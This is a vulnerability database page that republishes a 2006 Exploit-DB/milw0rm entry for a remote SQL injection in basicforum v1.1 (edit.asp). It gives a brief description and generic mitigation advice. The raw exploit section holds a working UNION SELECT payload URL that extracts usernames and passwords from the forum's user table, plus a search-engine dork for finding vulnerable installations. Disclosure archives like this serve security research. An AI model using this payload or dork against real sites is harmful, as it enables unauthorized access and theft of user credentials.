header-logo
Suggest Exploit
vendor:
basicforum
by:
bolivar
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: basicforum
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability

A vulnerability exists in basicforum v 1.1 (edit.asp) which allows remote attackers to inject arbitrary SQL commands via the 'type' and 'id' parameters. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can result in the compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped or removed.
Source

Exploit-DB raw data:

# Title   :  basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-25]

Navigation

Suggest Exploit

Services By CQR